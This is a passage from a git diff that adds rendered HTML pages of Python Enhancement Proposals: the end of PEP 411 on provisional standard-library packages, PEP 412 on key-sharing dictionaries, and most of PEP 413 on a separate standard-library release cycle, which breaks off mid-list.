This process allows the standard library to continue to evolve over time, +without locking in problematic design errors for extended periods of time. +See PEP 411 for more details.

+
+

The following will be added to the start of the package’s docstring:

+
+
The API of this package is currently provisional. Refer to the +documentation for details.
+

Moving a package from the provisional to the stable state simply implies +removing these notes from its documentation page and docstring.

+
+
+

Which packages should go through the provisional state

+

We expect most packages proposed for addition into the Python standard library +to go through a feature release in the provisional state. There may, however, +be some exceptions, such as packages that use a pre-defined API (for example +lzma, which generally follows the API of the existing bz2 package), +or packages with an API that has wide acceptance in the Python development +community.

+

In any case, packages that are proposed to be added to the standard library, +whether via the provisional state or directly, must fulfill the acceptance +conditions set by PEP 2.

+
+
+

Criteria for “graduation”

+

In principle, most provisional packages should eventually graduate to the +stable standard library. Some reasons for not graduating are:

+
    +
  • The package may prove to be unstable or fragile, without sufficient developer +support to maintain it.
  • +
  • A much better alternative package may be found during the preview release.
  • +
+

Essentially, the decision will be made by the core developers on a per-case +basis. The point to emphasize here is that a package’s inclusion in the +standard library as “provisional” in some release does not guarantee it will +continue being part of Python in the next release. At the same time, the bar +for making changes in a provisional package is quite high. We expect that +most of the API of most provisional packages will be unchanged at graduation. +Withdrawals are expected to be rare.

+
+
+
+

Rationale

+
+

Benefits for the core development team

+

Currently, the core developers are really reluctant to add new interfaces to +the standard library. This is because as soon as they’re published in a +release, API design mistakes get locked in due to backward compatibility +concerns.

+

By gating all major API additions through some kind of a provisional mechanism +for a full release, we get one full release cycle of community feedback +before we lock in the APIs with our standard backward compatibility guarantee.

+

We can also start integrating provisional packages with the rest of the standard +library early, so long as we make it clear to packagers that the provisional +packages should not be considered optional. The only difference between +provisional APIs and the rest of the standard library is that provisional APIs +are explicitly exempted from the usual backward compatibility guarantees.

+
+
+

Benefits for end users

+

For future end users, the broadest benefit lies in a better “out-of-the-box” +experience - rather than being told “oh, the standard library tools for task X +are horrible, download this 3rd party library instead”, those superior tools +are more likely to be just be an import away.

+

For environments where developers are required to conduct due diligence on +their upstream dependencies (severely harming the cost-effectiveness of, or +even ruling out entirely, much of the material on PyPI), the key benefit lies +in ensuring that all packages in the provisional state are clearly under +python-dev’s aegis from at least the following perspectives:

+
    +
  • Licensing: Redistributed by the PSF under a Contributor Licensing Agreement.
  • +
  • Documentation: The documentation of the package is published and organized via +the standard Python documentation tools (i.e. ReST source, output generated +with Sphinx and published on http://docs.python.org).
  • +
  • Testing: The package test suites are run on the python.org buildbot fleet +and results published via http://www.python.org/dev/buildbot.
  • +
  • Issue management: Bugs and feature requests are handled on +http://bugs.python.org
  • +
  • Source control: The master repository for the software is published +on http://hg.python.org.
  • +
+
+
+
+

Candidates for provisional inclusion into the standard library

+

For Python 3.3, there are a number of clear current candidates:

+ +

Other possible future use cases include:

+
    +
  • Improved HTTP modules (e.g. requests)
  • +
  • HTML 5 parsing support (e.g. html5lib)
  • +
  • Improved URL/URI/IRI parsing
  • +
  • A standard image API (PEP 368)
  • +
  • Improved encapsulation of import state (PEP 406)
  • +
  • Standard event loop API (PEP 3153)
  • +
  • A binary version of WSGI for Python 3 (e.g. PEP 444)
  • +
  • Generic function support (e.g. simplegeneric)
  • +
+
+
+

Rejected alternatives and variations

+

See PEP 408.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0411.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0412/index.html b/pep-0412/index.html new file mode 100644 index 00000000000..d958c8d823b --- /dev/null +++ b/pep-0412/index.html @@ -0,0 +1,322 @@ + + + + + + + + PEP 412 – Key-Sharing Dictionary | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 412 – Key-Sharing Dictionary

+
+
Author:
+
Mark Shannon <mark at hotpy.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
08-Feb-2012
+
Python-Version:
+
3.3
+
Post-History:
+
08-Feb-2012
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a change in the implementation of the builtin +dictionary type dict. The new implementation allows dictionaries +which are used as attribute dictionaries (the __dict__ attribute +of an object) to share keys with other attribute dictionaries of +instances of the same class.

+
+
+

Motivation

+

The current dictionary implementation uses more memory than is +necessary when used as a container for object attributes as the keys +are replicated for each instance rather than being shared across many +instances of the same class. Despite this, the current dictionary +implementation is finely tuned and performs very well as a +general-purpose mapping object.

+

By separating the keys (and hashes) from the values it is possible to +share the keys between multiple dictionaries and improve memory use. +By ensuring that keys are separated from the values only when +beneficial, it is possible to retain the high-performance of the +current dictionary implementation when used as a general-purpose +mapping object.

+
+
+

Behaviour

+

The new dictionary behaves in the same way as the old implementation. +It fully conforms to the Python API, the C API and the ABI.

+
+
+

Performance

+
+

Memory Usage

+

Reduction in memory use is directly related to the number of +dictionaries with shared keys in existence at any time. These +dictionaries are typically half the size of the current dictionary +implementation.

+

Benchmarking shows that memory use is reduced by 10% to 20% for +object-oriented programs with no significant change in memory use for +other programs.

+
+
+

Speed

+

The performance of the new implementation is dominated by memory +locality effects. When keys are not shared (for example in module +dictionaries and dictionary explicitly created by dict() or +{}) then performance is unchanged (within a percent or two) from +the current implementation.

+

For the shared keys case, the new implementation tends to separate +keys from values, but reduces total memory usage. This will improve +performance in many cases as the effects of reduced memory usage +outweigh the loss of locality, but some programs may show a small slow +down.

+

Benchmarking shows no significant change of speed for most benchmarks. +Object-oriented benchmarks show small speed ups when they create large +numbers of objects of the same class (the gcbench benchmark shows a +10% speed up; this is likely to be an upper limit).

+
+
+
+

Implementation

+

Both the old and new dictionaries consist of a fixed-sized dict struct +and a re-sizeable table. In the new dictionary the table can be +further split into a keys table and values array. The keys table +holds the keys and hashes and (for non-split tables) the values as +well. It differs only from the original implementation in that it +contains a number of fields that were previously in the dict struct. +If a table is split the values in the keys table are ignored, instead +the values are held in a separate array.

+
+

Split-Table dictionaries

+

When dictionaries are created to fill the __dict__ slot of an object, +they are created in split form. The keys table is cached in the type, +potentially allowing all attribute dictionaries of instances of one +class to share keys. In the event of the keys of these dictionaries +starting to diverge, individual dictionaries will lazily convert to +the combined-table form. This ensures good memory use in the common +case, and correctness in all cases.

+

When resizing a split dictionary it is converted to a combined table. +If resizing is as a result of storing an instance attribute, and there +is only instance of a class, then the dictionary will be re-split +immediately. Since most OO code will set attributes in the __init__ +method, all attributes will be set before a second instance is created +and no more resizing will be necessary as all further instance +dictionaries will have the correct size. For more complex use +patterns, it is impossible to know what is the best approach, so the +implementation allows extra insertions up to the point of a resize +when it reverts to the combined table (non-shared keys).

+

A deletion from a split dictionary does not change the keys table, it +simply removes the value from the values array.

+
+
+

Combined-Table dictionaries

+

Explicit dictionaries (dict() or {}), module dictionaries and +most other dictionaries are created as combined-table dictionaries. A +combined-table dictionary never becomes a split-table dictionary. +Combined tables are laid out in much the same way as the tables in the +old dictionary, resulting in very similar performance.

+
+
+
+

Implementation

+

The new dictionary implementation is available at [1].

+
+
+

Pros and Cons

+
+

Pros

+

Significant memory savings for object-oriented applications. Small +improvement to speed for programs which create lots of similar +objects.

+
+
+

Cons

+

Change to data structures: Third party modules which meddle with the +internals of the dictionary implementation will break.

+

Changes to repr() output and iteration order: For most cases, this +will be unchanged. However, for some split-table dictionaries the +iteration order will change.

+

Neither of these cons should be a problem. Modules which meddle with +the internals of the dictionary implementation are already broken and +should be fixed to use the API. The iteration order of dictionaries +was never defined and has always been arbitrary; it is different for +Jython and PyPy.

+
+
+

Alternative Implementation

+

An alternative implementation for split tables, which could save even +more memory, is to store an index in the value field of the keys table +(instead of ignoring the value field). This index would explicitly +state where in the value array to look. The value array would then +only require 1 field for each usable slot in the key table, rather +than each slot in the key table.

+

This “indexed” version would reduce the size of value array by about +one third. The keys table would need an extra “values_size” field, +increasing the size of combined dicts by one word. The extra +indirection adds more complexity to the code, potentially reducing +performance a little.

+

The “indexed” version will not be included in this implementation, but +should be considered deferred rather than rejected, pending further +experimentation.

+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0412.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0413/index.html b/pep-0413/index.html new file mode 100644 index 00000000000..39204401758 --- /dev/null +++ b/pep-0413/index.html @@ -0,0 +1,1000 @@ + + + + + + + + PEP 413 – Faster evolution of the Python Standard Library | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 413 – Faster evolution of the Python Standard Library

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Status:
+
Withdrawn
+
Type:
+
Process
+
Created:
+
24-Feb-2012
+
Post-History:
+
24-Feb-2012, 25-Feb-2012
+
+
+
+
Table of Contents +
+
+

PEP Withdrawal

+

With the acceptance of PEP 453 meaning that pip will be available to +most new Python users by default, this will hopefully reduce the pressure +to add new modules to the standard library before they are sufficiently +mature.

+

The last couple of years have also seen increased usage of the model where +a standard library package also has an equivalent available from the Python +Package Index that also supports older versions of Python.

+

Given these two developments and the level of engagement throughout the +Python 3.4 release cycle, the PEP author no longer feels it would be +appropriate to make such a fundamental change to the standard library +development process.

+
+
+

Abstract

+

This PEP proposes the adoption of a separate versioning scheme for the +standard library (distinct from, but coupled to, the existing language +versioning scheme) that allows accelerated releases of the Python standard +library, while maintaining (or even slowing down) the current rate of +change in the core language definition.

+

Like PEP 407, it aims to adjust the current balance between measured +change that allows the broader community time to adapt and being able to +keep pace with external influences that evolve more rapidly than the current +release cycle can handle (this problem is particularly notable for +standard library elements that relate to web technologies).

+

However, it’s more conservative in its aims than PEP 407, seeking to +restrict the increased pace of development to builtin and standard library +interfaces, without affecting the rate of change for other elements such +as the language syntax and version numbering as well as the CPython +binary API and bytecode format.

+
+
+

Rationale

+

To quote the PEP 407 abstract:

+
+
Finding a release cycle for an open-source project is a delicate exercise +in managing mutually contradicting constraints: developer manpower, +availability of release management volunteers, ease of maintenance for +users and third-party packagers, quick availability of new features (and +behavioural changes), availability of bug fixes without pulling in new +features or behavioural changes.

The current release cycle errs on the conservative side. It is adequate +for people who value stability over reactivity. This PEP is an attempt to +keep the stability that has become a Python trademark, while offering a +more fluid release of features, by introducing the notion of long-term +support versions.

+
+

I agree with the PEP 407 authors that the current release cycle of the +standard library is too slow to effectively cope with the pace of change +in some key programming areas (specifically, web protocols and related +technologies, including databases, templating and serialisation formats).

+

However, I have written this competing PEP because I believe that the +approach proposed in PEP 407 of offering full, potentially binary +incompatible releases of CPython every 6 months places too great a burden +on the wider Python ecosystem.

+

Under the current CPython release cycle, distributors of key binary +extensions will often support Python releases even after the CPython branches +enter “security fix only” mode (for example, Twisted currently ships binaries +for 2.5, 2.6 and 2.7, NumPy and SciPy support those 3 along with 3.1 and 3.2, +PyGame adds a 2.4 binary release, wxPython provides both 32-bit and 64-bit +binaries for 2.6 and 2.7, etc).

+

If CPython were to triple (or more) its rate of releases, the developers of +those libraries (many of which are even more resource starved than CPython) +would face an unpalatable choice: either adopt the faster release cycle +themselves (up to 18 simultaneous binary releases for PyGame!), drop +older Python versions more quickly, or else tell their users to stick to the +CPython LTS releases (thus defeating the entire point of speeding up the +CPython release cycle in the first place).

+

Similarly, many support tools for Python (e.g. syntax highlighters) can take +quite some time to catch up with language level changes.

+

At a cultural level, the Python community is also accustomed to a certain +meaning for Python version numbers - they’re linked to deprecation periods, +support periods, all sorts of things. PEP 407 proposes that collective +knowledge all be swept aside, without offering a compelling rationale for why +such a course of action is actually necessary (aside from, perhaps, making +the lives of the CPython core developers a little easier at the expense of +everyone else).

+

However, if we go back to the primary rationale for increasing the pace of +change (i.e. more timely support for web protocols and related technologies), +we can note that those only require standard library changes. That means +many (perhaps even most) of the negative effects on the wider community can +be avoided by explicitly limiting which parts of CPython are affected by the +new release cycle, and allowing other parts to evolve at their current, more +sedate, pace.

+
+
+

Proposal

+

This PEP proposes the introduction of a new kind of CPython release: +“standard library releases”. As with PEP 407, this will give CPython 3 kinds +of release:

+
    +
  • Language release: “x.y.0”
  • +
  • Maintenance release: “x.y.z” (where z > 0)
  • +
  • Standard library release: “x.y (xy.z)” (where z > 0)
  • +
+

Under this scheme, an unqualified version reference (such as “3.3”) would +always refer to the most recent corresponding language or maintenance +release. It will never be used without qualification to refer to a standard +library release (at least, not by python-dev - obviously, we can only set an +example, not force the rest of the Python ecosystem to go along with it).

+

Language releases will continue as they are now, as new versions of the +Python language definition, along with a new version of the CPython +interpreter and the Python standard library. Accordingly, a language +release may contain any and all of the following changes:

+
    +
  • new language syntax
  • +
  • new standard library changes (see below)
  • +
  • new deprecation warnings
  • +
  • removal of previously deprecated features
  • +
  • changes to the emitted bytecode
  • +
  • changes to the AST
  • +
  • any other significant changes to the compilation toolchain
  • +
  • changes to the core interpreter eval loop
  • +
  • binary incompatible changes to the C ABI (although the PEP 384 stable ABI +must still be preserved)
  • +
  • bug fixes
  • +
+

Maintenance releases will also continue as they do today, being strictly +limited to bug fixes for the corresponding language release. No new features +or radical internal changes are permitted.

+

The new standard library releases will occur in parallel with each +maintenance release and will be qualified with a new version identifier +documenting the standard library version. Standard library releases may +include the following changes:

+
    +
  • new features in pure Python modules
  • +
  • new features in C extension modules (subject to PEP 399 compatibility +requirements)
  • +
  • new features in language builtins (provided the C ABI remains unaffected)
  • +
  • bug fixes from the corresponding maintenance release
  • +
+

Standard library version identifiers are constructed by combining the major +and minor version numbers for the Python language release into a single two +digit number and then appending a sequential standard library version +identifier.

+
+

Release Cycle

+

When maintenance releases are created, two new versions of Python would +actually be published on python.org (using the first 3.3 maintenance release, +planned for February 2013 as an example):

+
3.3.1       # Maintenance release
+3.3 (33.1)  # Standard library release
+
+
+

A further 6 months later, the next 3.3 maintenance release would again be +accompanied by a new standard library release:

+
3.3.2       # Maintenance release
+3.3 (33.2)  # Standard library release
+
+
+

Again, the standard library release would be binary compatible with the +previous language release, merely offering additional features at the +Python level.

+

Finally, 18 months after the release of 3.3, a new language release would +be made around the same time as the final 3.3 maintenance and standard +library releases:

+
3.3.3       # Maintenance release
+3.3 (33.3)  # Standard library release
+3.4.0       # Language release
+
+
+

The 3.4 release cycle would then follow a similar pattern to that for 3.3:

+
3.4.1       # Maintenance release
+3.4 (34.1)  # Standard library release
+
+3.4.2       # Maintenance release
+3.4 (34.2)  # Standard library release
+
+3.4.3       # Maintenance release
+3.4 (34.3)  # Standard library release
+3.5.0       # Language release
+
+
+
+
+

Programmatic Version Identification

+

To expose the new version details programmatically, this PEP proposes the +addition of a new sys.stdlib_info attribute that records the new +standard library version above and beyond the underlying interpreter +version. Using the initial Python 3.3 release as an example:

+
sys.stdlib_info(python=33, version=0, releaselevel='final', serial=0)
+
+
+

This information would also be included in the sys.version string:

+
Python 3.3.0 (33.0, default, Feb 17 2012, 23:03:41)
+[GCC 4.6.1]
+
+
+
+
+

Security Fixes and Other “Out of Cycle” Releases

+

For maintenance releases the process of handling out-of-cycle releases (for +example, to fix a security issue or resolve a critical bug in a new release), +remains the same as it is now: the minor version number is incremented and a +new release is made incorporating the required bug fixes, as well as any +other bug fixes that have been committed since the previous release.

+

For standard library releases, the process is essentially the same, but the +corresponding “What’s New?” document may require some tidying up for the +release (as the standard library release may incorporate new features, +not just bug fixes).

+
+
+
+

User Scenarios

+

The versioning scheme proposed above is based on a number of user scenarios +that are likely to be encountered if this scheme is adopted. In each case, +the scenario is described for both the status quo (i.e. slow release cycle) +the versioning scheme in this PEP and the free wheeling minor version number +scheme proposed in PEP 407.

+

To give away the ending, the point of using a separate version number is that +for almost all scenarios, the important number is the language version, not +the standard library version. Most users won’t even need to care that the +standard library version number exists. In the two identified cases where +it matters, providing it as a separate number is actually clearer and more +explicit than embedding the two different kinds of number into a single +sequence and then tagging some of the numbers in the unified sequence as +special.

+
+

Novice user, downloading Python from python.org in March 2013

+

Status quo: must choose between 3.3 and 2.7

+

This PEP: must choose between 3.3 (33.1), 3.3 and 2.7.

+

PEP 407: must choose between 3.4, 3.3 (LTS) and 2.7.

+

Verdict: explaining the meaning of a Long Term Support release is about as +complicated as explaining the meaning of the proposed standard library release +version numbers. I call this a tie.

+
+
+

Novice user, attempting to judge currency of third party documentation

+

Status quo: minor version differences indicate 18-24 months of +language evolution

+

This PEP: same as status quo for language core, standard library version +numbers indicate 6 months of standard library evolution.

+

PEP 407: minor version differences indicate 18-24 months of language +evolution up to 3.3, then 6 months of language evolution thereafter.

+

Verdict: Since language changes and deprecations can have a much bigger +effect on the accuracy of third party documentation than the addition of new +features to the standard library, I’m calling this a win for the scheme +in this PEP.

+
+
+

Novice user, looking for an extension module binary release

+

Status quo: look for the binary corresponding to the Python version you are +running.

+

This PEP: same as status quo.

+

PEP 407 (full releases): same as status quo, but corresponding binary version +is more likely to be missing (or, if it does exist, has to be found amongst +a much larger list of alternatives).

+

PEP 407 (ABI updates limited to LTS releases): all binary release pages will +need to tell users that Python 3.3, 3.4 and 3.5 all need the 3.3 binary.

+

Verdict: I call this a clear win for the scheme in this PEP. Absolutely +nothing changes from the current situation, since the standard library +version is actually irrelevant in this case (only binary extension +compatibility is important).

+
+
+

Extension module author, deciding whether or not to make a binary release

+

Status quo: unless using the PEP 384 stable ABI, a new binary release is +needed every time the minor version number changes.

+

This PEP: same as status quo.

+

PEP 407 (full releases): same as status quo, but becomes a far more +frequent occurrence.

+

PEP 407 (ABI updates limited to LTS releases): before deciding, must first +look up whether the new release is an LTS release or an interim release. If +it is an LTS release, then a new build is necessary.

+

Verdict: I call this another clear win for the scheme in this PEP. As with +the end user facing side of this problem, the standard library version is +actually irrelevant in this case. Moving that information out to a +separate number avoids creating unnecessary confusion.

+
+
+

Python developer, deciding priority of eliminating a Deprecation Warning

+

Status quo: code that triggers deprecation warnings is not guaranteed to +run on a version of Python with a higher minor version number.

+

This PEP: same as status quo

+

PEP 407: unclear, as the PEP doesn’t currently spell this out. Assuming the +deprecation cycle is linked to LTS releases, then upgrading to a non-LTS +release is safe but upgrading to the next LTS release may require avoiding +the deprecated construct.

+

Verdict: another clear win for the scheme in this PEP since, once again, the +standard library version is irrelevant in this scenario.

+
+
+

Alternative interpreter implementor, updating with new features

+

Status quo: new Python versions arrive infrequently, but are a mish-mash of +standard library updates and core language definition and interpreter +changes.

+

This PEP: standard library updates, which are easier to integrate, are +made available more frequently in a form that is clearly and explicitly +compatible with the previous version of the language definition. This means +that, once an alternative implementation catches up to Python 3.3, they +should have a much easier time incorporating standard library features as +they happen (especially pure Python changes), leaving minor version number +updates as the only task that requires updates to their core compilation and +execution components.

+

PEP 407 (full releases): same as status quo, but becomes a far more +frequent occurrence.

+

PEP 407 (language updates limited to LTS releases): unclear, as the PEP +doesn’t currently spell out a specific development strategy. Assuming a +3.3 compatibility branch is adopted (as proposed in this PEP), then the +outcome would be much the same, but the version number signalling would be +slightly less clear (since you would have to check to see if a particular +release was an LTS release or not).

+

Verdict: while not as clear cut as some previous scenarios, I’m still +calling this one in favour of the scheme in this PEP. Explicit is better than +implicit, and the scheme in this PEP makes a clear split between the two +different kinds of update rather than adding a separate “LTS” tag to an +otherwise ordinary release number. Tagging a particular version as being +special is great for communicating with version control systems and associated +automated tools, but it’s a lousy way to communicate information to other +humans.

+
+
+

Python developer, deciding their minimum version dependency

+

Status quo: look for “version added” or “version changed” markers in the +documentation, check against sys.version_info

+

This PEP: look for “version added” or “version changed” markers in the +documentation. If written as a bare Python version, such as “3.3”, check +against sys.version_info. If qualified with a standard library version, +such as “3.3 (33.1)”, check against sys.stdlib_info.

+

PEP 407: same as status quo

+

Verdict: the scheme in this PEP actually allows third party libraries to be +more explicit about their rate of adoption of standard library features. More +conservative projects will likely pin their dependency to the language +version and avoid features added in the standard library releases. Faster +moving projects could instead declare their dependency on a particular +standard library version. However, since PEP 407 does have the advantage of +preserving the status quo, I’m calling this one for PEP 407 (albeit with a +slim margin).

+
+
+

Python developers, attempting to reproduce a tracker issue

+

Status quo: if not already provided, ask the reporter which version of +Python they’re using. This is often done by asking for the first two lines +displayed by the interactive prompt or the value of sys.version.

+

This PEP: same as the status quo (as sys.version will be updated to +also include the standard library version), but may be needed on additional +occasions (where the user knew enough to state their Python version, but that +proved to be insufficient to reproduce the fault).

+

PEP 407: same as the status quo

+

Verdict: another marginal win for PEP 407. The new standard library version +is an extra piece of information that users may need to pass back to +developers when reporting issues with Python libraries (or Python itself, +on our own tracker). However, by including it in sys.version, many +fault reports will already include it, and it is easy to request if needed.

+
+
+

CPython release managers, handling a security fix

+

Status quo: create a new maintenance release incorporating the security +fix and any other bug fixes under source control. Also create source releases +for any branches open solely for security fixes.

+

This PEP: same as the status quo for maintenance branches. Also create a +new standard library release (potentially incorporating new features along +with the security fix). For security branches, create source releases for +both the former maintenance branch and the standard library update branch.

+

PEP 407: same as the status quo for maintenance and security branches, +but handling security fixes for non-LTS releases is currently an open +question.

+

Verdict: until PEP 407 is updated to actually address this scenario, a +clear win for this PEP.

+
+
+
+

Effects

+
+

Effect on development cycle

+

Similar to PEP 407, this PEP will break up the delivery of new features into +more discrete chunks. Instead of a whole raft of changes landing all at once +in a language release, each language release will be limited to 6 months +worth of standard library changes, as well as any changes associated with +new syntax.

+
+
+

Effect on workflow

+

This PEP proposes the creation of a single additional branch for use in the +normal workflow. After the release of 3.3, the following branches would be +in use:

+
2.7         # Maintenance branch, no change
+3.3         # Maintenance branch, as for 3.2
+3.3-compat  # New branch, backwards compatible changes
+default     # Language changes, standard library updates that depend on them
+
+
+

When working on a new feature, developers will need to decide whether or not +it is an acceptable change for a standard library release. If so, then it +should be checked in on 3.3-compat and then merged to default. +Otherwise it should be checked in directly to default.

+

The “version added” and “version changed” markers for any changes made on +the 3.3-compat branch would need to be flagged with both the language +version and the standard library version. For example: “3.3 (33.1)”.

+

Any changes made directly on the default branch would just be flagged +with “3.4” as usual.

+

The 3.3-compat branch would be closed to normal development at the +same time as the 3.3 maintenance branch. The 3.3-compat branch would +remain open for security fixes for the same period of time as the 3.3 +maintenance branch.

+
+
+

Effect on bugfix cycle

+

The effect on the bug fix workflow is essentially the same as that on the +workflow for new features - there is one additional branch to pass through +before the change reaches the default branch.

+

If critical bugs are found in a maintenance release, then new maintenance and +standard library releases will be created to resolve the problem. The final +part of the version number will be incremented for both the language version +and the standard library version.

+

If critical bugs are found in a standard library release that do not affect +the associated maintenance release, then only a new standard library release +will be created and only the standard library’s version number will be +incremented.

+

Note that in these circumstances, the standard library release may include +additional features, rather than just containing the bug fix. It is +assumed that anyone that cares about receiving only bug fixes without any +new features mixed in will already be relying strictly on the maintenance +releases rather than using the new standard library releases.

+
+
+

Effect on the community

+

PEP 407 has this to say about the effects on the community:

+
+
People who value stability can just synchronize on the LTS releases which, +with the proposed figures, would give a similar support cycle (both in +duration and in stability).
+

I believe this statement is just plain wrong. Life isn’t that simple. Instead, +developers of third party modules and frameworks will come under pressure to +support the full pace of the new release cycle with binary updates, teachers +and book authors will receive complaints that they’re only covering an “old” +version of Python (“You’re only using 3.3, the latest is 3.5!”), etc.

+

As the minor version number starts climbing 3 times faster than it has in the +past, I believe perceptions of language stability would also fall (whether +such opinions were justified or not).

+

I believe isolating the increased pace of change to the standard library, +and clearly delineating it with a separate version number will greatly +reassure the rest of the community that no, we’re not suddenly +asking them to triple their own rate of development. Instead, we’re merely +going to ship standard library updates for the next language release in +6-monthly installments rather than delaying them all until the next language +definition update, even those changes that are backwards compatible with the +previously released version of Python.

+

The community benefits listed in PEP 407 are equally applicable to this PEP, +at least as far as the standard library is concerned:

+
+
People who value reactivity and access to new features (without taking the +risk to install alpha versions or Mercurial snapshots) would get much more +value from the new release cycle than currently.

People who want to contribute new features or improvements would be more +motivated to do so, knowing that their contributions will be more quickly +available to normal users.

+
+

If the faster release cycle encourages more people to focus on contributing +to the standard library rather than proposing changes to the language +definition, I don’t see that as a bad thing.

+
+
+
+

Handling News Updates

+
+

What’s New?

+

The “What’s New” documents would be split out into separate documents for +standard library releases and language releases. So, during the 3.3 release +cycle, we would see:

+
    +
  • What’s New in Python 3.3?
  • +
  • What’s New in the Python Standard Library 33.1?
  • +
  • What’s New in the Python Standard Library 33.2?
  • +
  • What’s New in the Python Standard Library 33.3?
  • +
+

And then finally, we would see the next language release:

+
    +
  • What’s New in Python 3.4?
  • +
+

For the benefit of users that ignore standard library releases, the 3.4 +What’s New would link back to the What’s New documents for each of the +standard library releases in the 3.3 series.

+
+
+

NEWS

+

Merge conflicts on the NEWS file are already a hassle. Since this PEP +proposes introduction of an additional branch into the normal workflow, +resolving this becomes even more critical. While Mercurial phases may +help to some degree, it would be good to eliminate the problem entirely.

+

One suggestion from Barry Warsaw is to adopt a non-conflicting +separate-files-per-change approach, similar to that used by Twisted [2].

+

Given that the current manually updated NEWS file will be used for the 3.3.0 +release, one possible layout for such an approach might look like:

+
Misc/
+  NEWS  # Now autogenerated from news_entries
+  news_entries/
+    3.3/
+      NEWS # Original 3.3 NEWS file
+      maint.1/ # Maintenance branch changes
+        core/
+          <news entries>
+        builtins/
+          <news entries>
+        extensions/
+          <news entries>
+        library/
+          <news entries>
+        documentation/
+          <news entries>
+        tests/
+          <news entries>
+      compat.1/ # Compatibility branch changes
+        builtins/
+          <news entries>
+        extensions/
+          <news entries>
+        library/
+          <news entries>
+        documentation/
+          <news entries>
+        tests/
+          <news entries>
+      # Add maint.2, compat.2 etc as releases are made
+    3.4/
+      core/
+        <news entries>
+      builtins/
+        <news entries>
+      extensions/
+        <news entries>
+      library/
+        <news entries>
+      documentation/
+        <news entries>
+      tests/
+        <news entries>
+      # Add maint.1, compat.1 etc as releases are made
+
+
+

Putting the version information in the directory hierarchy isn’t strictly +necessary (since the NEWS file generator could figure out from the version +history), but does make it easier for humans to keep the different versions +in order.

+
+
+
+

Other benefits of reduced version coupling

+
+

Slowing down the language release cycle

+

The current release cycle is a compromise between the desire for stability +in the core language definition and C extension ABI, and the desire to get +new features (most notably standard library updates) into user’s hands more +quickly.

+

With the standard library release cycle decoupled (to some degree) from that +of the core language definition, it provides an opportunity to actually +slow down the rate of change in the language definition. The language +moratorium for Python 3.2 effectively slowed that cycle down to more than 3 +years (3.1: June 2009, 3.3: August 2012) without causing any major +problems or complaints.

+

The NEWS file management scheme described above is actually designed to +allow us the flexibility to slow down language releases at the same time +as standard library releases become more frequent.

+

As a simple example, if a full two years was allowed between 3.3 and 3.4, +the 3.3 release cycle would end up looking like:

+
3.2.4       # Maintenance release
+3.3.0       # Language release
+
+3.3.1       # Maintenance release
+3.3 (33.1)  # Standard library release
+
+3.3.2       # Maintenance release
+3.3 (33.2)  # Standard library release
+
+3.3.3       # Maintenance release
+3.3 (33.3)  # Standard library release
+
+3.3.4       # Maintenance release
+3.3 (33.4)  # Standard library release
+3.4.0       # Language release
+
+
+

The elegance of the proposed branch structure and NEWS entry layout is that +this decision wouldn’t really need to be made until shortly before the planned +3.4 release date. At that point, the decision could be made to postpone the +3.4 release and keep the 3.3 and 3.3-compat branches open after the +3.3.3 maintenance release and the 3.3 (33.3) standard library release, thus +adding another standard library release to the cycle. The choice between +another standard library release or a full language release would then be +available every 6 months after that.

+
+
+

Further increasing the pace of standard library development

+

As noted in the previous section, one benefit of the scheme proposed in this +PEP is that it largely decouples the language release cycle from the +standard library release cycle. The standard library could be updated every +3 months, or even once a month, without having any flow on effects on the +language version numbering or the perceived stability of the core language.

+

While that pace of development isn’t practical as long as the binary +installer creation for Windows and Mac OS X involves several manual steps +(including manual testing) and for as long as we don’t have separate +“<branch>-release” trees that only receive versions that have been marked as +good by the stable buildbots, it’s still a useful criterion to keep in mind +when considering proposed new versioning schemes: what if we eventually want +to make standard library releases even faster than every 6 months?

+

If the practical issues were ever resolved, then the separate standard +library versioning scheme in this PEP could handle it. The tagged version +number approach proposed in PEP 407 could not (at least, not without a lot +of user confusion and uncertainty).

+
+
+
+

Other Questions

+
+

Why not use the major version number?

+

The simplest and most logical solution would actually be to map the +major.minor.micro version numbers to the language version, stdlib version +and maintenance release version respectively.

+

Instead of releasing Python 3.3.0, we would instead release Python 4.0.0 +and the release cycle would look like:

+
4.0.0  # Language release
+
+4.0.1  # Maintenance release
+4.1.0  # Standard library release
+
+4.0.2  # Maintenance release
+4.2.0  # Standard library release
+
+4.0.3  # Maintenance release
+4.3.0  # Standard library release
+5.0.0  # Language release
+
+
+

However, the ongoing pain of the Python 2 -> Python 3 transition (and +associated workarounds like the python3 and python2 symlinks to +refer directly to the desired release series) means that this simple option +isn’t viable for historical reasons.

+

One way that this simple approach could be made to work is to merge the +current major and minor version numbers directly into a 2-digit major +version number:

+
33.0.0  # Language release
+
+33.0.1  # Maintenance release
+33.1.0  # Standard library release
+
+33.0.2  # Maintenance release
+33.2.0  # Standard library release
+
+33.0.3  # Maintenance release
+33.3.0  # Standard library release
+34.0.0  # Language release
+
+
+
+
+

Why not use a four part version number?

+

Another simple versioning scheme would just add a “standard library” version +into the existing versioning scheme:

+
3.3.0.0  # Language release
+
+3.3.0.1  # Maintenance release
+3.3.1.0  # Standard library release
+
+3.3.0.2  # Maintenance release
+3.3.2.0  # Standard library release
+
+3.3.0.3  # Maintenance release
+3.3.3.0  # Standard library release
+3.4.0.0  # Language release
+
+
+

However, this scheme isn’t viable due to backwards compatibility constraints +on the sys.version_info structure.

+
+
+

Why not use a date-based versioning scheme?

+

Earlier versions of this PEP proposed a date-based versioning scheme for +the standard library. However, such a scheme made it very difficult to +handle out-of-cycle releases to fix security issues and other critical +bugs in standard library releases, as it required the following steps:

+
    +
